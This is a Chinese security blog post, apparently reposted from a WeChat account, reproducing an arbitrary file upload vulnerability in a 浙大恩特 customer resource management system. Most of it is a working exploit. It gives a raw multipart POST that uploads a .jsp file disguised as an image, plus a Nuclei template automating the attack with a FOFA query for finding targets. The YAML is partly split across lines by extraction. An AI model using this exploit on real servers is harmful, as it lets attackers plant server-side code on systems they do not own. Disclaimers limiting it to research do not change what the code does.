night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞概述
浙大恩特客户资源管理系统中machord_doc.jsp;.js接口处存在任意文件文件上传漏洞。
漏洞复现
POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=night.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----4225820000370152680749129212
Content-Length: 548
------4225820000370152680749129212
Content-Disposition: form-data; name="oprfilenam"
null
------4225820000370152680749129212
Content-Disposition: form-data; name="uploadflg"
0
------4225820000370152680749129212
Content-Disposition: form-data; name="strAffixStr"
------4225820000370152680749129212
Content-Disposition: form-data; name="selfilenam"
------4225820000370152680749129212
Content-Disposition: form-data; name="uploadfile"; filename="night.jsp"
Content-Type: image/png
night
------4225820000370152680749129212--
NUCLEI POC
id
: enter-machord_doc-api-fileupload
info:
name: 浙大恩特客户资源管理系统machord_doc.jsp;
.js
接口任意文件上传
author:
YGnight
severity:
high
description:
description
reference:
- https:
//
metadata:
verified:
true
max
-request:
1
fofa-query: app=
"浙大恩特客户资源管理系统"
requests:
-
raw:
-
|-
POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=night.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/
5.0
(Macintosh; Intel Mac OS X
10.15
; rv:
109.0
) Gecko/
20100101
Firefox/
112.0
uacq
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept
-
Language
: zh
-
CN,zh;q
=
0.8
,zh
-
TW;q
=
0.7
,zh
-
HK;q
=
0.5
,en
-
US;q
=
0.3
,en;q
=
0.2
Accept-Encoding:
gzip,
deflate
Connection:
close
Content-Type: multipart/form-data; boundary=----4225820000370152680749129212
Content
-Length:
548
------4225820000370152680749129212
Content-Disposition: form-
data
; name=
"oprfilenam"
null
------4225820000370152680749129212
Content-Disposition: form-
data
; name=
"uploadflg"
0
------4225820000370152680749129212
Content-Disposition: form-
data
; name=
"strAffixStr"
------4225820000370152680749129212
Content-Disposition: form-
data
; name=
"selfilenam"
------4225820000370152680749129212
Content-Disposition: form-
data
; name=
"uploadfile"
; filename=
"night.jsp"
Content-Type: image/png
night
------4225820000370152680749129212--
matchers
-
condition
:
and
matchers:
-
type
:
status
status
:
-
200
-
type
: word
words:
-
'night.jsp'
原文始发于微信公众号(night安全):【漏洞复现】某客户资源管理系统machord_doc.jsp;.js接口任意文件上传 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论